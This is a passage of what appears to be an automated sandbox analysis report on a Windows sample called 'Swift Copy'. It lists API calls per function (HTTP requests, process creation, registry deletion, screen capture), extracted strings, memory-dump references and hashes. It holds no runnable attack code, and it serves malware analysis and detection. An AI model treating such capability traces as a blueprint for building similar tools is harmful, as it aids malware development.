                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D900C6
                                                • Part of subcall function 00D900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00E4070C,00000FA0,0F2CF504,?,?,?,?,00DB23B3,000000FF), ref: 00D9011C
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90127
                                                • Part of subcall function 00D900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DB23B3,000000FF), ref: 00D90138
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D9014E
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D9015C
                                                • Part of subcall function 00D900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D9016A
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D90195
                                                • Part of subcall function 00D900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D901A0
                                              • ___scrt_fastfail.LIBCMT ref: 00D900E7
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
                                              Strings
                                              • SleepConditionVariableCS, xrefs: 00D90154
                                              • kernel32.dll, xrefs: 00D90133
                                              • InitializeConditionVariable, xrefs: 00D90148
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D90122
                                              • WakeAllConditionVariable, xrefs: 00D90162
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 66158676-1714406822
                                              • Opcode ID: 5c9b81c0f83341c3e3c19eb7b028e2beed4cb88d3011257d064aa6beb75ec4fe
                                              • Instruction ID: 9e8a14c55f258ddd4d0955eacf98b4bf4ce25400e4d5f363716eee11f6ac01c7
                                              • Opcode Fuzzy Hash: 5c9b81c0f83341c3e3c19eb7b028e2beed4cb88d3011257d064aa6beb75ec4fe
                                              • Instruction Fuzzy Hash: A7210B32A45710AFDB216BA5BC09B6A3BA4DB05F51F14023AF901F36D1DB759C448AB1
                                              APIs
                                              • CharLowerBuffW.USER32(00000000,00000000,00E0CC08), ref: 00DE4527
                                              • _wcslen.LIBCMT ref: 00DE453B
                                              • _wcslen.LIBCMT ref: 00DE4599
                                              • _wcslen.LIBCMT ref: 00DE45F4
                                              • _wcslen.LIBCMT ref: 00DE463F
                                              • _wcslen.LIBCMT ref: 00DE46A7
                                                • Part of subcall function 00D8F9F2: _wcslen.LIBCMT ref: 00D8F9FD
                                              • GetDriveTypeW.KERNEL32(?,00E36BF0,00000061), ref: 00DE4743
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharDriveLowerType
                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                              • API String ID: 2055661098-1000479233
                                              • Opcode ID: ea374400a9683b0e3c1187c7a312c225effda207ccafa88db57ebcb9dbb2d806
                                              • Instruction ID: 3b6cc769cdb60d2222536a2545912b3f74d50b93341b2650020f451fbd7b2aa5
                                              • Opcode Fuzzy Hash: ea374400a9683b0e3c1187c7a312c225effda207ccafa88db57ebcb9dbb2d806
                                              • Instruction Fuzzy Hash: D1B1D1316083429FC710EF2AC891A6EB7E5EFA5720F54891DF49AD7291E730D845CBB2
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • DragQueryPoint.SHELL32(?,?), ref: 00E09147
                                                • Part of subcall function 00E07674: ClientToScreen.USER32(?,?), ref: 00E0769A
                                                • Part of subcall function 00E07674: GetWindowRect.USER32(?,?), ref: 00E07710
                                                • Part of subcall function 00E07674: PtInRect.USER32(?,?,00E08B89), ref: 00E07720
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E091B0
                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E091BB
                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E091DE
                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E09225
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00E0923E
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09255
                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 00E09277
                                              • DragFinish.SHELL32(?), ref: 00E0927E
                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E09371
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                              • API String ID: 221274066-136824727
                                              • Opcode ID: 924ad3a16ea9d34320ac8a23542c4b4b23c1d2070ff06082c5d9ecef34614bfc
                                              • Instruction ID: c6f737c6a122bd406831a3d2ea7ab4abc7ae6b29473d8dabdfee72c8b1cef335
                                              • Opcode Fuzzy Hash: 924ad3a16ea9d34320ac8a23542c4b4b23c1d2070ff06082c5d9ecef34614bfc
                                              • Instruction Fuzzy Hash: 43617971108301AFC701DF65DC85DAFBBE8EFC9750F104A1DF595A21A1EB319A89CB62
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DFB198
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1B0
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB1D4
                                              • _wcslen.LIBCMT ref: 00DFB200
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB214
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DFB236
                                              • _wcslen.LIBCMT ref: 00DFB332
                                                • Part of subcall function 00DE05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DE05C6
                                              • _wcslen.LIBCMT ref: 00DFB34B
                                              • _wcslen.LIBCMT ref: 00DFB366
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DFB3B6
                                              • GetLastError.KERNEL32(00000000), ref: 00DFB407
                                              • CloseHandle.KERNEL32(?), ref: 00DFB439
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB44A
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB45C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFB46E
                                              • CloseHandle.KERNEL32(?), ref: 00DFB4E3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                              • String ID:
                                              • API String ID: 2178637699-0
                                              • Opcode ID: 5a93c9679c33e9070725686be38d0a0d28d2c78a04607c5e0dd1be6e36591ebd
                                              • Instruction ID: 578b0f307d6a5bd00f33560d9540fe98f654aaa5546444ae5745e1b0a14608ea
                                              • Opcode Fuzzy Hash: 5a93c9679c33e9070725686be38d0a0d28d2c78a04607c5e0dd1be6e36591ebd
                                              • Instruction Fuzzy Hash: 04F17A315042449FC714EF24C891B2ABBE1EF85724F19895EF9999B2A2DB31EC44CB72
                                              APIs
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB2F8D
                                              • GetMenuItemCount.USER32(00E41990), ref: 00DB303D
                                              • GetCursorPos.USER32(?), ref: 00DB3081
                                              • SetForegroundWindow.USER32(00000000), ref: 00DB308A
                                              • TrackPopupMenuEx.USER32(00E41990,00000000,?,00000000,00000000,00000000), ref: 00DB309D
                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DB30A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                              • String ID: 0
                                              • API String ID: 36266755-4108050209
                                              • Opcode ID: 55b4c309496a00d4a418ec4e56e6babb659477564c3f6305f2aab0f0fd79c511
                                              • Instruction ID: 1d3d857678dccc7842f7c31648db2602340d0ba48fd23c06bb31c72821ac4275
                                              • Opcode Fuzzy Hash: 55b4c309496a00d4a418ec4e56e6babb659477564c3f6305f2aab0f0fd79c511
                                              • Instruction Fuzzy Hash: A271F271640205FEEB219F2ACC49FFABF64FF04364F244206F5296A1E1C7B2A954DB60
                                              APIs
                                              • DestroyWindow.USER32(?,?), ref: 00E06DEB
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E06E5F
                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E06E81
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06E94
                                              • DestroyWindow.USER32(?), ref: 00E06EB5
                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D70000,00000000), ref: 00E06EE4
                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E06EFD
                                              • GetDesktopWindow.USER32 ref: 00E06F16
                                              • GetWindowRect.USER32(00000000), ref: 00E06F1D
                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E06F35
                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E06F4D
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                              • String ID: 0$tooltips_class32
                                              • API String ID: 2429346358-3619404913
                                              • Opcode ID: a05449c7296f3207831183652e21aa2d51d45f3e57dc96c40e05b889b44996f7
                                              • Instruction ID: 3d6286d67e2b132560c1674c895779439fa844deaafd13c5173a88a4d4700121
                                              • Opcode Fuzzy Hash: a05449c7296f3207831183652e21aa2d51d45f3e57dc96c40e05b889b44996f7
                                              • Instruction Fuzzy Hash: 00719C74100341AFDB21CF19DC44FAABBE9FB89708F14051DF689A72A1D771E99ACB12
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DEC4B0
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC4C3
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC4D7
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DEC4F0
                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DEC533
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DEC549
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DEC554
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DEC584
                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DEC5DC
                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DEC5F0
                                              • InternetCloseHandle.WININET(00000000), ref: 00DEC5FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                              • String ID:
                                              • API String ID: 3800310941-3916222277
                                              • Opcode ID: cbf77d460b4cbb9d9b70cf25da592048fc7cf4fff7eb10ca34ec8240a608bae1
                                              • Instruction ID: 57394d2f178add36145f2e3ed67be6c4c724181f12a2f8b10ababc7c043d51e4
                                              • Opcode Fuzzy Hash: cbf77d460b4cbb9d9b70cf25da592048fc7cf4fff7eb10ca34ec8240a608bae1
                                              • Instruction Fuzzy Hash: C7519EB0110788BFDB21AF62C948AAB7BFCFF08744F14551AF94596250DB31E949DB70
                                              APIs
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00E08592
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00E085A2
                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00E085AD
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085BA
                                              • GlobalLock.KERNEL32(00000000), ref: 00E085C8
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E085D7
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E085E0
                                              • CloseHandle.KERNEL32(00000000), ref: 00E085E7
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00E085F8
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,?), ref: 00E08611
                                              • GlobalFree.KERNEL32(00000000), ref: 00E08621
                                              • GetObjectW.GDI32(?,00000018,000000FF), ref: 00E08641
                                              • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00E08671
                                              • DeleteObject.GDI32(00000000), ref: 00E08699
                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E086AF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                              • String ID:
                                              • API String ID: 3840717409-0
                                              • Opcode ID: cdf2df8ac72b20792773084263c68dccfd64656618c9d6c073476161807b3e66
                                              • Instruction ID: a0a876359bb63fa409f30028fbb0176dedcc4f33351c35ce0c9e4ba6c9f4d81e
                                              • Opcode Fuzzy Hash: cdf2df8ac72b20792773084263c68dccfd64656618c9d6c073476161807b3e66
                                              • Instruction Fuzzy Hash: EE414C71600204EFDB119FA5DD88EAA7BB8FF89715F108158F945E72A0DB319985CB20
                                              APIs
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1502
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DE150B
                                              • VariantClear.OLEAUT32(?), ref: 00DE1517
                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DE15FB
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00DE1657
                                              • VariantInit.OLEAUT32(?), ref: 00DE1708
                                              • SysFreeString.OLEAUT32(?), ref: 00DE178C
                                              • VariantClear.OLEAUT32(?), ref: 00DE17D8
                                              • VariantClear.OLEAUT32(?), ref: 00DE17E7
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1823
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 1234038744-3931177956
                                              • Opcode ID: 51865064b579b5916f3d9d2930ba00ef12cefa1f4e676d3decfd4e5c3ebd003d
                                              • Instruction ID: 34882b6418e38f4f1b8a4df5b678fa16daee4b364b8cc7a8a74a7cc5976365d0
                                              • Opcode Fuzzy Hash: 51865064b579b5916f3d9d2930ba00ef12cefa1f4e676d3decfd4e5c3ebd003d
                                              • Instruction Fuzzy Hash: 03D1DC76B00245EBDB01BF66D885BADB7B5FF44700F24855AE886AB184DB30EC84DB71
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB6F4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFB772
                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00DFB80A
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB87E
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB89C
                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DFB8F2
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFB904
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFB922
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DFB983
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFB994
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 146587525-4033151799
                                              • Opcode ID: 5588437f3e01d999477dca3e8b7063ec73a0f0dd2a0fcf8f7b69ebbf90d61f49
                                              • Instruction ID: 80562c3d03429b384feade8840153cedb9aaf8ab79512e6a457a27af47fbc186
                                              • Opcode Fuzzy Hash: 5588437f3e01d999477dca3e8b7063ec73a0f0dd2a0fcf8f7b69ebbf90d61f49
                                              • Instruction Fuzzy Hash: 25C18B30204205AFD710DF24C495F2ABBE5EF84318F69C55DE69A8B2A2DB71E845CFA1
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DF25D8
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DF25E8
                                              • CreateCompatibleDC.GDI32(?), ref: 00DF25F4
                                              • SelectObject.GDI32(00000000,?), ref: 00DF2601
                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DF266D
                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DF26AC
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DF26D0
                                              • SelectObject.GDI32(?,?), ref: 00DF26D8
                                              • DeleteObject.GDI32(?), ref: 00DF26E1
                                              • DeleteDC.GDI32(?), ref: 00DF26E8
                                              • ReleaseDC.USER32(00000000,?), ref: 00DF26F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
